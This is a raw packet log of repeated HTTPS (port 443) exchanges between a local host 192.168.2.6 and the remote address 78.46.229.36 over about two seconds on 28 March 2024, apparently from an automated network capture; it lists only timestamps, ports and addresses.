Mar 28, 2024 20:34:58.059899092 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.059906960 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.061790943 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.061798096 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.666552067 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.666573048 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.666589022 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.666825056 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.666825056 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.666841030 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.666889906 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.752203941 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.752235889 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.752403975 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.752403975 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.752419949 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.752475977 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.873732090 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.873760939 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.873840094 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.873856068 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.873899937 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.958736897 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.958755016 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.958808899 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.958817959 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.958844900 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:58.958868980 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.027312994 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.027331114 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.027388096 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.027396917 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.027426004 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.027460098 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.068150997 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.068170071 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.068332911 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.068341970 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.068394899 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.105221987 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.105238914 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.105407000 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.105418921 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.105465889 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.143215895 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.143235922 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.143316031 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.143328905 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.143377066 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.172957897 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.172975063 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.173048973 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.173073053 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.173120975 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.209064007 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.209084034 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.209150076 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.209157944 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.209228039 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.239675999 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.239691973 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.239780903 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.239789009 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.239840031 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.261873007 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.261893988 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.261954069 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.261960983 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.261998892 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.283204079 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.283220053 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.283288956 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.283294916 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.283338070 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.304387093 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.304402113 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.304497004 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.304502964 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.304565907 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.322469950 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.322484016 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.322566032 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.322571039 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.322633982 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.338239908 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.338254929 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.338356972 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.338363886 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.338409901 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.354990959 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.355010033 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.355074883 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.355082035 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.355125904 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.368383884 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.368398905 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.368462086 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.368468046 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.368513107 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.383989096 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.384006023 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.384072065 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.384080887 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.384162903 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.397588968 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.397608042 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.397670031 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.397676945 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.397767067 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.409723043 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.409739017 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.409802914 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.409810066 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.409837961 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.409857035 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.424140930 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.424156904 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.424253941 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.424261093 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.424310923 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.435770988 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.435789108 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.435858965 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.435866117 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.435913086 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.446732998 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.446749926 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.446816921 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.446825027 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.446912050 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.459340096 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.459357023 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.459440947 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.459450006 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.459501982 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.469122887 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.469141006 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.469213963 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.469221115 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.469266891 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.479886055 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.479902983 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.479964018 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.479969978 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.480009079 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.489288092 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.489304066 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.489366055 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.489372015 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.489398956 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.489430904 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.500164986 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.500180006 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.500236034 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.500241041 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.500274897 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.509624004 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.509639978 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.509700060 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.509706020 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.509746075 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.518038034 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.518054962 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.518122911 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.518127918 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.518201113 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.527448893 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.527467012 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.527523994 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.527529955 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.527575016 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.527590990 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.535243034 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.535264969 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.535319090 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.535324097 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.535357952 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.535379887 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.543518066 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.543581963 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.543582916 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.543593884 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.543648958 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.550926924 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.550951004 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.550993919 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.550998926 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.551034927 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.551054955 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.559103966 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.559127092 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.559180975 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.559185982 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.559228897 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.559252024 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.566423893 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.566441059 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.566488028 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.566492081 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.566525936 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.566569090 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.573297024 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.573316097 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.573370934 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.573379993 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.573424101 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.580833912 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.580848932 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.580904007 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.580909967 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.580956936 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.587110996 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.587129116 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.587173939 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.587178946 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.587205887 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.587229967 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.594194889 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.594208956 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.594276905 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.594281912 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.594329119 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.600675106 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.600691080 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.600747108 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.600754023 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.600795031 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.606405020 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.606420994 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.606482029 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.606487989 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.606535912 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.612087011 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.612101078 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.612190962 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.612204075 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.612252951 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.618418932 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.618432045 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.618514061 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.618524075 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.618613005 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.624267101 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.624284983 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.624346972 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.624351025 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.624391079 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.629937887 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.629955053 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.630012989 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.630018950 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.630063057 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.635407925 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.635422945 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.635479927 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.635484934 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.635526896 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.640393972 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.640409946 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.640475988 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.640481949 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.640605927 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.645843983 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.645867109 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.645925045 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.645931005 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.645972967 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.651418924 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.651437998 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.651510000 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.651515961 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.651561975 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.656172037 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.656193018 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.656276941 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.656284094 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.656342030 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.660857916 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.660872936 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.660964012 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.660969973 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.661029100 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.665796041 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.665810108 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.665868998 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.665873051 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.665932894 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.671123028 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.671137094 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.671210051 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.671215057 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.671261072 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.676304102 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.676320076 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.676382065 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.676388979 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.676423073 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.676445007 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.681382895 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.681399107 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.681458950 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.681466103 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.681510925 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.686064005 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.686078072 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.686165094 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.686170101 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.686219931 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.690351963 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.690372944 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.690433979 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.690438986 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.690483093 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.694478989 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.694494963 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.694557905 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.694562912 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.694603920 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.699315071 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.699331999 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.699395895 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.699402094 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.699476957 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.703722000 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.703737020 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.703799009 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.703804016 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.703847885 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.707797050 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.707811117 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.707869053 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.707879066 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.707923889 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.712515116 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.712529898 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.712594032 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.712599993 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.712645054 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:59.716177940 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:59.716198921 CET	443	49714	78.46.229.36	192.168.2.6
